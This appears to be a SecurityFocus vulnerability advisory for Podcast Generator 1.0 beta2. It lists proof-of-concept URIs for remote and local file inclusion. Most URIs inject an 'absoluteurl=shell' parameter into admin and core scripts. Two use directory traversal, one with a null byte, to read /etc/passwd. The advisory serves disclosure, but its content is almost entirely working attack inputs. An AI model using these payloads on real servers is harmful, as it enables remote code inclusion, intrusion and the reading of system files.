Podcast Generator Multiple Remote And Local File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=shell
http://www.example.com/podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=shell
http://www.example.com/podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=shell
http://www.example.com/podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=shell
http://www.example.com/podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=shell
http://www.example.com/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=shell
http://www.example.com/podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=shell
http://www.example.com/podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=shell
http://www.example.com/podcastgen1.0beta2/core/admin/login.php?absoluteurl=shell
http://www.example.com/podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=shell
http://www.example.com/podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=shell
http://www.example.com/podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=shell
http://www.example.com/podcastgen1.0beta2/core/archive_cat.php?absoluteurl=shell
http://www.example.com/podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=shell
http://www.example.com/podcastgen1.0beta2/core/recent_list.php?absoluteurl=shell
http://www.example.com/podcastgen1.0beta2/core/themes.php?theme_path=../../../../../../../../../etc/passwd%00
http://www.example.com/podcastgen1.0beta2/download.php?filename=../../../../../../../../../etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus